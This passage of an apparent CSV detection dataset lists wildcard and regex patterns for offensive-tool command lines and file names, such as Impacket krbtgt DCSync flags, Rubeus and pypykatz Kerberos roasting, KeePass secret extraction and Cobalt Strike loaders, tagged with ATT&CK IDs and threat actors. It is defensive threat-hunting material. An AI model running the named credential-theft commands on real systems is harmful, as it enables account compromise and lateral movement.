T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* john_log_format2*",".{0,1000}\sjohn_log_format2.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* john_mpi_wait*",".{0,1000}\sjohn_mpi_wait.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* john_omp_fallback*",".{0,1000}\sjohn_omp_fallback.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* john_omp_init*",".{0,1000}\sjohn_omp_init.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* john_omp_maybe_adjust_or_fallback*",".{0,1000}\sjohn_omp_maybe_adjust_or_fallback.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* john_omp_show_info*",".{0,1000}\sjohn_omp_show_info.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* john_register_all*",".{0,1000}\sjohn_register_all.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* john_register_one*",".{0,1000}\sjohn_register_one.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* john_run*",".{0,1000}\sjohn_run.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* john_set_mpi*",".{0,1000}\sjohn_set_mpi.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* john_set_tristates*",".{0,1000}\sjohn_set_tristates.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* john_the_ripper_cracker.py*",".{0,1000}\sjohn_the_ripper_cracker\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "* john_wait*",".{0,1000}\sjohn_wait.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* JohnTheRipper/*",".{0,1000}\sJohnTheRipper\/.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* JspShell ua*",".{0,1000}\sJspShell\sua.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "* JuicyPotatoNG*",".{0,1000}\sJuicyPotatoNG.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","0","N/A","10","8","767","97","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" "* JumpSession.x64.o*",".{0,1000}\sJumpSession\.x64\.o.{0,1000}","offensive_tool_keyword","JumpSession_BOF","Beacon Object File allowing creation of Beacons in different sessions","T1055 - T1055.012 - T1548.002","TA0002 - TA0003 - TA0004","N/A","N/A","Persistence","https://github.com/Octoberfest7/JumpSession_BOF","1","0","N/A","9","1","77","12","2022-05-23T22:23:33Z","2022-05-21T17:38:18Z" "* JumpSession.x86.o*",".{0,1000}\sJumpSession\.x86\.o.{0,1000}","offensive_tool_keyword","JumpSession_BOF","Beacon Object File allowing creation of Beacons in different sessions","T1055 - T1055.012 - T1548.002","TA0002 - TA0003 - TA0004","N/A","N/A","Persistence","https://github.com/Octoberfest7/JumpSession_BOF","1","0","N/A","9","1","77","12","2022-05-23T22:23:33Z","2022-05-21T17:38:18Z" "* -just-dc-ntlm *",".{0,1000}\s\-just\-dc\-ntlm\s\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "* -just-dc-ntlm -just-dc-user krbtgt *",".{0,1000}\s\-just\-dc\-ntlm\s\-just\-dc\-user\skrbtgt\s.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213","TA0006 - TA0008 - TA0009","N/A","N/A","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","0","N/A","10","5","493","62","2023-12-18T16:05:02Z","2022-04-29T09:08:32Z" "* -just-dc-user *",".{0,1000}\s\-just\-dc\-user\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "* -just-dc-user 'krbtgt' -dc-ip * -k -no-pass @*",".{0,1000}\s\-just\-dc\-user\s\'krbtgt\'\s\-dc\-ip\s\s.{0,1000}\s\-k\s\-no\-pass\s\@.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* -k * -c *.exe* -p Outlook.Application -o *.hta*",".{0,1000}\s\-k\s.{0,1000}\s\-c\s.{0,1000}\.exe.{0,1000}\s\-p\sOutlook\.Application\s\-o\s.{0,1000}\.hta.{0,1000}","offensive_tool_keyword","demiguise","The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. and (if you use environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","0","N/A","9","10","1344","253","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z" "* -k * -c *cmd.exe /c * -o *.hta -p ShellBrowserWindow*",".{0,1000}\s\-k\s.{0,1000}\s\-c\s.{0,1000}cmd\.exe\s\/c\s.{0,1000}\s\-o\s.{0,1000}\.hta\s\-p\sShellBrowserWindow.{0,1000}","offensive_tool_keyword","demiguise","The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. and (if you use environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","0","N/A","9","10","1344","253","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z" "* -k --kerberoast*",".{0,1000}\s\-k\s\-\-kerberoast.{0,1000}","offensive_tool_keyword","SilentHound","Quietly enumerate an Active Directory Domain via LDAP parsing users + admins + groups...","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/layer8secure/SilentHound","1","0","AD Enumeration","7","5","465","44","2023-01-23T20:41:55Z","2022-07-01T13:49:24Z" "* -k -request-user * -dc-ip*",".{0,1000}\s\-k\s\-request\-user\s.{0,1000}\s\-dc\-ip.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "* k8gege520 *",".{0,1000}\sk8gege520\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "* kali-install.sh*",".{0,1000}\skali\-install\.sh.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "* kalilinux/kali-rolling*",".{0,1000}\skalilinux\/kali\-rolling.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "* KaynInject.h*",".{0,1000}\sKaynInject\.h.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","N/A","9","5","494","101","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z" "* KaynStrike.cna*",".{0,1000}\sKaynStrike\.cna.{0,1000}","offensive_tool_keyword","KaynStrike","A User Defined Reflective Loader for Cobalt Strike Beacon that spoofs the thread start address and frees itself after entry point was executed.","T1055 - T1036 - T1070 - T1055.012 - T1055.001","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynStrike","1","0","N/A","9","4","382","60","2023-12-03T18:05:11Z","2022-05-30T04:22:59Z" "* kdbof.cpp*",".{0,1000}\skdbof\.cpp.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of pwn1sher's KillDefender","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KillDefender_BOF","1","0","N/A","10","10","55","14","2022-06-28T15:54:15Z","2022-02-11T07:03:59Z" "* keepass /unprotect*",".{0,1000}\skeepass\s\/unprotect.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","1058","200","2024-02-24T01:14:36Z","2018-08-22T17:39:31Z" "* keepass backdoor persistence*",".{0,1000}\skeepass\sbackdoor\spersistence.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1302","244","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" "* Keepass persistence backdoor *",".{0,1000}\sKeepass\spersistence\sbackdoor\s.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1302","244","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" "* KeePwn.py*",".{0,1000}\sKeePwn\.py.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","10","5","418","35","2024-04-19T13:37:16Z","2023-01-27T13:59:38Z" "* KeeTheft.exe*",".{0,1000}\sKeeTheft\.exe.{0,1000}","offensive_tool_keyword","KeeThiefSyscalls","Patch GhostPack/KeeThief for it to use DInvoke and syscalls","T1003.001 - T1558.002","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/Metro-Holografix/KeeThiefSyscalls","1","0","private github repo","10","1","N/A","N/A","N/A","N/A" "* kekeo/modules/kull_m_memory.c*",".{0,1000}\skekeo\/modules\/kull_m_memory\.c.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","10","10","273","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "* kerberoast *",".{0,1000}\skerberoast\s.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* kerberoast *",".{0,1000}\skerberoast\s.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* kerberoast /spn:*",".{0,1000}\skerberoast\s\/spn\:.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","10","10","273","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "* Kerberoastable -action list*",".{0,1000}\sKerberoastable\s\-action\slist.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","7","4","326","30","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z" "* Kerberoastable -action write -target *",".{0,1000}\sKerberoastable\s\-action\swrite\s\-target\s.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","7","4","326","30","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z" "* Kerberoastables.txt*",".{0,1000}\sKerberoastables\.txt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* --kerberoasting *",".{0,1000}\s\-\-kerberoasting\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* --kerberoasting*",".{0,1000}\s\-\-kerberoasting.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "* kerberos asreproast *",".{0,1000}\skerberos\sasreproast\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* kerberos brute * -d *",".{0,1000}\skerberos\sbrute\s.{0,1000}\s\-d\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* kerberos brute *.txt*",".{0,1000}\skerberos\sbrute\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* kerberos ccache del *.ccache*",".{0,1000}\skerberos\sccache\sdel\s.{0,1000}\.ccache.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* kerberos ccache exportkirbi *",".{0,1000}\skerberos\sccache\sexportkirbi\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* kerberos ccache list *.ccache*",".{0,1000}\skerberos\sccache\slist\s.{0,1000}\.ccache.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* kerberos ccache loadkirbi *",".{0,1000}\skerberos\sccache\sloadkirbi\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* kerberos ccache roast *",".{0,1000}\skerberos\sccache\sroast\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* kerberos keytab *.keytab*",".{0,1000}\skerberos\skeytab\s.{0,1000}\.keytab.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* kerberos kirbi parse *",".{0,1000}\skerberos\skirbi\sparse\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* kerberos spnroast *",".{0,1000}\skerberos\sspnroast\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* kerberos tgt *kerberos+rc4://*:*@*",".{0,1000}\skerberos\stgt\s.{0,1000}kerberos\+rc4\:\/\/.{0,1000}\:.{0,1000}\@.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* kerberos.py*",".{0,1000}\skerberos\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral 